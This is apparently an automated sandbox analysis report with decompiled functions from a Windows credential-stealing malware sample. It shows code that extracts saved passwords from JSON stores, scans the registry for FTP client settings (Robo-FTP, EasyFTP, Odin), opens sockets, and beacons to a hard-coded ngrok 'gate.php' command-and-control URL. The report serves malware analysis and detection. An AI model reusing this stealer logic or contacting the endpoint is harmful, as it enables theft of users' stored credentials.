logins, xrefs: 0040BE41

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
Instruction ID: 4e1aa7e609f9c63133400eaf0fbab0bfe716398796ba7bb72f53a7a8be838654
Opcode Fuzzy Hash: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
Instruction Fuzzy Hash: FB31E97581020EFACF21DF94CC469EEBB79EB04328F204276A121B61E0D7759A54DF9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406FBB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				void* _t19;
				void* _t20;
				intOrPtr* _t23;
				intOrPtr* _t27;
				intOrPtr* _t29;
				char* _t31;
				void* _t37;
				char _t39;
				char* _t40;

				_t37 = __ecx;
				_t19 = E00401F36(_a8); // executed
				_t20 = _t19;
				if(_t20 != 0) {
					_t23 = E00401FFD(__eflags, _a8,  &_v20);
					__eflags = _t23;
					if(_t23 != 0) {
						_v24 = E004018CF(_v8);
						E00401906(_v12, _v24, _v8);
						_t40 = _v24;
						while(1) {
							__eflags =  *_t40;
							if( *_t40 == 0) {
								break;
							}
							_t27 = StrStrIA(_t40, "\"password\" : \"");
							__eflags = _t27;
							if(_t27 != 0) {
								_push("\"password\" : \"");
								L0041066A();
								_t40 = _t27 + _t27;
								_v28 = _t40;
								_t29 = StrStrIA(_t40, "\",");
								__eflags = _t29;
								if(__eflags != 0) {
									 *_t29 = 0;
									_push( *_t29);
									E00406F43(_t29, _t37, __eflags, _a4, _v28);
									_pop(_t39);
									_t31 = _t29;
									 *_t31 = _t39;
									continue;
								}
								break;
							}
							break;
						}
						E00401569(_a4, 0xbeef1001);
						E0040159F(_a4, _v24, _v8);
						E004018B8(_v24);
						return E00402091( &_v20);
					}
					return _t23;
				} else {
					return _t20;
				}
			}

0x00406fbb
0x00406fc5
0x00406fca
0x00406fcc
0x00406fdf
0x00406fdf
0x00406fe1
0x00406fef
0x00406ffb
0x00407000
0x0040704e
0x0040704e
0x00407051
0x00000000
0x00000000
0x00407010
0x00407010
0x00407012
0x00407018
0x0040701d
0x00407022
0x00407024
0x00407032
0x00407032
0x00407034
0x0040703a
0x0040703e
0x00407045
0x0040704a
0x0040704b
0x0040704c
0x00000000
0x0040704c
0x00000000
0x00407036
0x00000000
0x00407014
0x0040705b
0x00407069
0x00407071
0x00000000
0x0040707a
0x00407083
0x00406fd0
0x00406fd0
0x00406fd0

Strings

"password" : ", xrefs: 00407005, 00407018

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 6fd4af748b8573febd7bcca386ce731f7469ffd517da67a06c032a95694d9d11
Instruction ID: bee61a90249f81009c8457dd16d7b53d7f9fc3dd6c708c4ffa186b800f2db450
Opcode Fuzzy Hash: 6fd4af748b8573febd7bcca386ce731f7469ffd517da67a06c032a95694d9d11
Instruction Fuzzy Hash: 2C21CF71C08109FECF11BBA18C029EE7E66AF41358F204137F400B51A1E3794B91A7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2CB, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040D2CB(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _t16;
				intOrPtr* _t17;
				void* _t22;
				void* _t26;

				_t16 = E00401D71(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
				_t17 = _t16;
				if(_t17 != 0) {
					_push(_t17);
					if(_v8 != 4) {
						L9:
						return E004018B8();
					}
					 *_t4 =  *_t17;
					if(_v12 > 0x1f4) {
						_v12 = 0x1f4;
					}
					while(_v12 != 0) {
						wsprintfA( &_v32, "FTP File%d", _v12);
						_t26 = _t26 + 0xc;
						_t22 = E00401D71(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
						_t23 = _t22;
						if(_t22 != 0) {
							E0040406C(_a4, _t23, 0xbeef0001);
							E004018B8(_t23);
						}
						_v12 = _v12 - 1;
					}
					goto L9;
				}
				return _t17;
			}

0x0040d2e2
0x0040d2e7
0x0040d2e9
0x0040d2eb
0x0040d2f0
0x0040d351
0x00000000
0x0040d351
0x0040d2f4
0x0040d2fe
0x0040d300
0x0040d300
0x0040d34b
0x0040d315
0x0040d31a
0x0040d32b
0x0040d330
0x0040d332
0x0040d33e
0x0040d343
0x0040d343
0x0040d348
0x0040d348
0x00000000
0x0040d34b
0x0040d357

APIs

wsprintfA.USER32 ref: 0040D315

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

FTP Count, xrefs: 0040D2D5
FTP File%d, xrefs: 0040D30C
SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D2DA, 0040D323

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
Instruction ID: 199b26d5468ed6bde52246b1b6ef23e8a9f49e1214d4f7d1b5726db887637ddc
Opcode Fuzzy Hash: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
Instruction Fuzzy Hash: 62015E71D40109FAEF00BAD0CC82EEE7B79AB00718F508476F910B11D1D7BD9B98DA6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401226, Relevance: 6.0, APIs: 4, Instructions: 39
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401226(void* __eax) {
				void* _t12;
				void* _t13;
				long _t16;
				void* _t24;
				void* _t25;

				_t12 = __eax;
				_push(0);
				_push(3);
				_push(0);
				_push(3);
				_push(0x80000000);
				ExitProcess( *(_t25 + 8)); // executed
				 *(_t25 - 4) = _t12;
				_t13 = _t12 + 1;
				if(_t13 != 0) {
					while(1) {
						_t16 = ReadFile( *(_t25 - 4), _t25 - 0x1008, 0x1000, _t25 - 8, 0); // executed
						__eflags = _t16;
						if(__eflags == 0) {
							break;
						}
						E0040118C(_t25 - 0x1008, _t24, __eflags,  *((intOrPtr*)(_t25 + 0xc)), _t25 - 0x1008,  *(_t25 - 8)); // executed
						__eflags =  *(_t25 - 8);
						if( *(_t25 - 8) != 0) {
							continue;
						} else {
							CloseHandle( *(_t25 - 4));
							return 1;
						}
						goto L6;
					}
					CloseHandle( *(_t25 - 4));
					__eflags = 0;
					return 0;
				} else {
					return _t13;
				}
				L6:
			}

0x00401226
0x00401226
0x00401228
0x0040122a
0x0040122c
0x0040122e
0x00401236
0x0040123b
0x0040123e
0x0040123f
0x00401245
0x0040125a
0x0040125f
0x00401261
0x00000000
0x00000000
0x0040127e
0x00401283
0x00401287
0x00000000
0x00401289
0x0040128c
0x00401297
0x00401297
0x00000000
0x00401287
0x00401266
0x0040126b
0x0040126e
0x00401241
0x00401242
0x00401242
0x00000000

APIs

ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseExitFileHandleProcessRead
String ID:
API String ID: 1390701169-0
Opcode ID: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
Instruction ID: 77f65db424b8dbfecb4d9d0992eed673c7479144c9e59104ccc0ab534344ee26
Opcode Fuzzy Hash: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
Instruction Fuzzy Hash: D6F0FF31940108BADF21AB50CC42FDD7A78AB64349F1080A6B544F50E0D6B99BE49B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD78, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD78(char* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _t26;
				char* _t32;
				char* _t34;
				char* _t37;
				void* _t41;
				char* _t43;
				void* _t44;

				_t41 = __edx;
				_t40 = __ecx;
				_t37 = __ebx;
				E00403FFB(); // executed
				 *(_t44 - 0x14) = 0;
				_t26 = E00401000(_t44 - 0x14, __ecx, __eflags, _t44 - 0x14);
				_t48 =  *(_t44 - 0x14);
				if( *(_t44 - 0x14) == 0) {
					_t26 = E00401000(_t44 - 0x14, __ecx, _t48, _t44 - 0x14);
					_t49 =  *(_t44 - 0x14);
					if( *(_t44 - 0x14) == 0) {
						_t26 = E00401000(_t44 - 0x14, __ecx, _t49, _t44 - 0x14);
					}
				}
				_t50 =  *(_t44 - 0x14);
				if( *(_t44 - 0x14) == 0) {
					L23:
					E00401021(_t26, _t37, _t40, _t41, _t54,  *(_t44 - 0x14));
					return _t37;
				}
				_t26 = E0040FD22(_t44 - 0x10, _t50,  *(_t44 - 0x14), _t44 - 0x10); // executed
				if(_t26 == 1) {
					_t43 = "http://63e2e5290bcf.ngrok.io/gate.php";
					while( *_t43 != 0) {
						_t37 = _t37;
						if(_t37 == 0) {
							 *(_t44 - 0x1c) = 2;
							while(1) {
								 *(_t44 - 0x18) = 0;
								_t32 = E00403F97(_t43, _t43,  *(_t44 - 0x14), _t44 - 0x18);
								_t33 = _t32;
								__eflags = _t32;
								if(__eflags != 0) {
									__eflags =  *(_t44 - 0x18);
									if(__eflags != 0) {
										_t37 = _t33;
										__eflags = _t37;
										if(__eflags == 0) {
											_t34 = E00401BC0(_t40, _t43,  *(_t44 - 0x18));
											_t33 = _t34;
											__eflags = _t34;
											if(__eflags != 0) {
												_t37 = _t33;
											}
										}
									}
								}
								_t26 = E00401021(_t33, _t37, _t40, _t41, __eflags,  *(_t44 - 0x18));
								_t37 = _t37;
								__eflags = _t37;
								if(_t37 != 0) {
									break;
								}
								__eflags =  *(_t44 - 0x1c);
								if( *(_t44 - 0x1c) == 0) {
									break;
								}
								 *(_t44 - 0x1c) =  *(_t44 - 0x1c) - 1;
								Sleep(0x1388);
							}
							while(1) {
								__eflags =  *_t43;
								if( *_t43 == 0) {
									break;
								}
								_t43 =  &(_t43[1]);
								__eflags = _t43;
							}
							_t43 =  &(_t43[1]);
							__eflags = _t43;
							continue;
						}
						break;
					}
					_t37 = _t37;
					_t54 = _t37;
					if(_t37 != 0) {
						_t26 = E004026DD("Client Hash", _t44 - 0x10, 0x10);
					}
				}
			}

0x0040fd78
0x0040fd78
0x0040fd78
0x0040fd78
0x0040fd7d
0x0040fd88
0x0040fd8d
0x0040fd91
0x0040fd97
0x0040fd9c
0x0040fda0
0x0040fda6
0x0040fda6
0x0040fda0
0x0040fdab
0x0040fdaf
0x0040fe61
0x0040fe64
0x0040fe6e
0x0040fe6e
0x0040fdbc
0x0040fdc4
0x0040fdca
0x0040fe44
0x0040fe49
0x0040fe4b
0x0040fdd1
0x0040fdd8
0x0040fdd8
0x0040fde7
0x0040fdec
0x0040fdec
0x0040fdee
0x0040fdf0
0x0040fdf4
0x0040fe00
0x0040fe00
0x0040fe02
0x0040fe07
0x0040fe0c
0x0040fe0c
0x0040fe0e
0x0040fe18
0x0040fe18
0x0040fe0e
0x0040fe02
0x0040fdf4
0x0040fe1d
0x0040fe22
0x0040fe22
0x0040fe24
0x00000000
0x00000000
0x0040fe26
0x0040fe2a
0x00000000
0x00000000
0x0040fe2c
0x0040fe34
0x0040fe34
0x0040fe3e
0x0040fe3e
0x0040fe41
0x00000000
0x00000000
0x0040fe3d
0x0040fe3d
0x0040fe3d
0x0040fe43
0x0040fe43
0x00000000
0x0040fe43
0x00000000
0x0040fe4b
0x0040fe4d
0x0040fe4d
0x0040fe4f
0x0040fe5c
0x0040fe5c
0x0040fe4f

APIs

Part of subcall function 00403FFB: WSAStartup.WSOCK32(00000101,?), ref: 00404010

Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34

Strings

http://63e2e5290bcf.ngrok.io/gate.php, xrefs: 0040FDCA, 0040FDE6
Client Hash, xrefs: 0040FE57

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: SleepStartup
String ID: Client Hash$http://63e2e5290bcf.ngrok.io/gate.php
API String ID: 1372284471-2662672100
Opcode ID: 78a4a6f96dc1a635fbcf011c39bdbaa13436c5c534892032cf82ccab31f3c8ae
Instruction ID: 534881ec054deb94b57e270d36c90eed6f3ef705066acc8506ca45b4f3c416af
Opcode Fuzzy Hash: 78a4a6f96dc1a635fbcf011c39bdbaa13436c5c534892032cf82ccab31f3c8ae
Instruction Fuzzy Hash: B9210171D0024A9ADF31EAE1C9467FF7A74AB40349F10003BE241715E2D7BC4D99DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A2, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040A0A2(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				void* _t8;
				char* _t11;
				void* _t19;
				void* _t20;
				char* _t21;
				char* _t22;

				_t20 = __ecx;
				_t19 = __ebx;
				_v8 = E004015F0(_a4, 0x2a, 0);
				_t8 = E00401EB1(__eflags, 0); // executed
				_t9 = _t8;
				if(_t8 != 0) {
					E00404351(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
					E004018B8(_t9);
				}
				_t22 =  *0x4147ed; // 0x640b38
				_t21 =  *0x4147f1; // 0x645e80
				if( *_t21 != 0) {
					do {
						_t11 = StrStrIA(_t21, "Odin");
						_t26 = _t11;
						if(_t11 != 0) {
							E00404351(_a4, E0040242B(_t26, _t22), "SiteInfo.QFP", 0xbeef0000);
							E004018B8(_t14);
						}
						while( *_t22 != 0) {
							_t22 = _t22 + 1;
							__eflags = _t22;
						}
						_t22 = _t22 + 1;
						asm("cld");
						_t20 = 0xffffffff;
						asm("repne scasb");
						_t28 =  *_t21;
					} while ( *_t21 != 0);
				}
				return E00401636(_t19, _t20, _t21, _t28, _a4, _v8);
			}

0x0040a0a2
0x0040a0a2
0x0040a0b6
0x0040a0bb
0x0040a0c0
0x0040a0c2
0x0040a0d3
0x0040a0d8
0x0040a0d8
0x0040a0dd
0x0040a0e3
0x0040a0ec
0x0040a0ee
0x0040a0f4
0x0040a0f9
0x0040a0fb
0x0040a112
0x0040a117
0x0040a117
0x0040a11f
0x0040a11e
0x0040a11e
0x0040a11e
0x0040a124
0x0040a125
0x0040a128
0x0040a12d
0x0040a12f
0x0040a12f
0x0040a0ee
0x0040a141

APIs

StrStrIA.SHLWAPI(00645E80,Odin), ref: 0040A0F4

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

Odin, xrefs: 0040A0EE
SiteInfo.QFP, xrefs: 0040A0CA, 0040A109

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
Instruction ID: cb19261180e9835e7d6e10c1a09fddbbd42b6fc3f6f61c88a0af093412c8222d
Opcode Fuzzy Hash: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
Instruction Fuzzy Hash: E501D670500205BAEB213B258C06FAF7E59DB82314F24413BBD10B51E3E67C8EA192ED

Uniqueness

Uniqueness Score: -1.00%

Function 004075D2, Relevance: 4.6, APIs: 3, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004075D2(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				char _v2072;
				long _t24;
				long _t25;
				intOrPtr _t32;

				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t25 = _t24;
				if(_t25 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_t32 = E00401D71(_a8, _a12,  &_v2064,  &_v2072);
						_v2068 = _t32;
						if(_t32 != 0 && _v2072 != 0) {
							E00404017(_a4, _v2068, _v2072, 0xbeef0000);
						}
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t25;
			}

0x004075e5
0x004075ea
0x004075ec
0x004075f2
0x004075f9
0x004075f9
0x00407620
0x00000000
0x00000000
0x00407638
0x0040763d
0x00407645
0x00407664
0x00407664
0x0040766f
0x00407674
0x00407674
0x00000000
0x0040767c
0x00407682

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
RegEnumValueA.ADVAPI32 ref: 00407619
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
Instruction ID: 85ca958a1271cad8174414d3164074e3ff60ec8eec34d7e66a6ef738b10b5b92
Opcode Fuzzy Hash: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
Instruction Fuzzy Hash: 44113D3180010DBADF119F90CC41FDEBBB9BF04304F1085B6B515B01A0DB796B919F99

Uniqueness

Uniqueness Score: -1.00%

Function 00403800, Relevance: 4.6, APIs: 3, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00403800(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, short _a12) {
				intOrPtr _v16;
				short _v18;
				char _v20;
				void* _t15;
				intOrPtr _t16;
				char* _t17;
				void* _t19;

				_t19 = 0;
				_push(6);
				_push(1);
				_push(2); // executed
				L00410838(); // executed
				if(__eax != 0xffffffff) {
					_t19 = __eax;
					_t15 = E004018E6( &_v20, 0x10);
					_v20 = 2;
					_v18 = _a12;
					if(_a8 == 0) {
						if(_a8 != 0 || _a4 != 0) {
							_t16 = E004037C6(_t15, _a4); // executed
							if(_t16 != 0xffffffff) {
								goto L9;
							} else {
								goto L10;
							}
						} else {
							goto L10;
						}
					} else {
						_t16 = _a8;
						L9:
						_v16 = _t16;
						_push(0x10);
						_t17 =  &_v20;
						_push(_t17);
						_push(_t19); // executed
						L0041083E(); // executed
						if(_t17 == 0xffffffff) {
							L10:
							_push(_t19);
							L00410844();
							_t19 = 0;
						}
					}
				} else {
				}
				return _t19;
			}

0x00403807
0x00403809
0x0040380b
0x0040380d
0x0040380f
0x00403817
0x0040381b
0x00403823
0x00403828
0x00403833
0x0040383b
0x00403846
0x00403855
0x0040385d
0x00000000
0x0040385f
0x00000000
0x0040385f
0x0040384e
0x00000000
0x0040384e
0x0040383d
0x0040383d
0x00403861
0x00403861
0x00403864
0x00403866
0x00403869
0x0040386a
0x0040386b
0x00403873
0x00403875
0x00403875
0x00403876
0x0040387b
0x0040387b
0x00403873
0x00000000
0x00403819
0x00403881

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 0040380F
connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
Instruction ID: 08d913eedad497c84f2e0313ceade0e14c6413b499fa458ef27ae104aaf27b56
Opcode Fuzzy Hash: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
Instruction Fuzzy Hash: 39018832904208AADB10BE758C85BEE769CAF00325F10CA7BB524651D1D7BCCB84D61A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3AC, Relevance: 4.6, APIs: 3, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F3AC(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t22;
				long _t23;
				long _t26;
				void* _t35;

				_t35 = __ecx;
				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t23 = _t22;
				if(_t23 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t26 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t27 = _t26;
						if(_t26 != 0) {
							break;
						}
						_v2068 = E00401E4C(E00401E4C( &_v2064, E00401DF8(_t27, _a12, "\\"),  &_v2064), _t30, _a16);
						E0040F30D(_t35, _a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t23;
			}

0x0040f3ac
0x0040f3bf
0x0040f3c4
0x0040f3c6
0x0040f3cc
0x0040f3d3
0x0040f3d3
0x0040f3f3
0x0040f3f8
0x0040f3fa
0x00000000
0x00000000
0x0040f423
0x0040f435
0x0040f440
0x0040f445
0x0040f445
0x00000000
0x0040f44d
0x0040f453

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
RegEnumKeyExA.ADVAPI32 ref: 0040F3F3
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: f59b2ffa348ce8f7d525ad48ce5023c37a9f7864b087909e0c1e877aeb0058bd
Instruction ID: 25757aefe436132530bd79105f2911b35f687820d7f807c11c3c7734766150bd
Opcode Fuzzy Hash: f59b2ffa348ce8f7d525ad48ce5023c37a9f7864b087909e0c1e877aeb0058bd
Instruction Fuzzy Hash: 5D112A3590010DBADF11AF91CC42FDE7BB9BF00704F1080B6B914B51E1DBB9AA94AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F30D, Relevance: 4.5, APIs: 3, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F30D(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t21;
				long _t22;
				long _t25;
				void* _t33;

				_t33 = __ecx;
				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t22 = _t21;
				if(_t22 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t25 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t26 = _t25;
						if(_t25 != 0) {
							break;
						}
						_v2068 = E00401E4C( &_v2064, E00401DF8(_t26, _a12, "\\"),  &_v2064);
						E0040F178(_t33, _a4, _a8, _v2068, 0);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t22;
			}

0x0040f30d
0x0040f320
0x0040f325
0x0040f327
0x0040f329
0x0040f330
0x0040f330
0x0040f350
0x0040f355
0x0040f357
0x00000000
0x00000000
0x0040f377
0x0040f38b
0x0040f396
0x0040f39b
0x0040f39b
0x00000000
0x0040f3a3
0x0040f3a9

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
RegEnumKeyExA.ADVAPI32 ref: 0040F350
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: aa58425948128efde0c861dc7b0a2f434e841ffe9590bdedd6073662ee1f3d27
Instruction ID: 45928e3938db904d05e16263eed0eecc5d6e07d10bcb7dd287d335a9eaebcbfe
Opcode Fuzzy Hash: aa58425948128efde0c861dc7b0a2f434e841ffe9590bdedd6073662ee1f3d27
Instruction Fuzzy Hash: C6113C31900108BADF11AF91CC02FEE7BB9BF00704F1081B6B914B51E1DBB96A94AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB74, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CB74(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char* _v12;
				char* _t11;
				char* _t12;
				char* _t14;
				void* _t20;
				void* _t21;
				void* _t22;

				_t22 = __edi;
				_t21 = __ecx;
				_t20 = __ebx;
				_v8 = E004015F0(_a4, 0x43, 0);
				_t11 = E00401D71(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
				_t12 = _t11;
				if(_t12 != 0) {
					_v12 = _t12;
					_t14 = StrStrIA(_v12, "EasyFTP");
					_t24 = _t14;
					if(_t14 != 0) {
						E004041A6(_t21, _a4, E0040242B(_t24, _v12), 0, 0xbeef0000, E0040CB28);
						E004018B8(_t17);
					}
					E004018B8(_v12);
				}
				return E00401636(_t20, _t21, _t22, _t24, _a4, _v8);
			}

0x0040cb74
0x0040cb74
0x0040cb74
0x0040cb86
0x0040cb97
0x0040cb9c
0x0040cb9e
0x0040cba0
0x0040cbab
0x0040cbb0
0x0040cbb2
0x0040cbcd
0x0040cbd2
0x0040cbd2
0x0040cbda
0x0040cbda
0x0040cbeb

APIs

StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
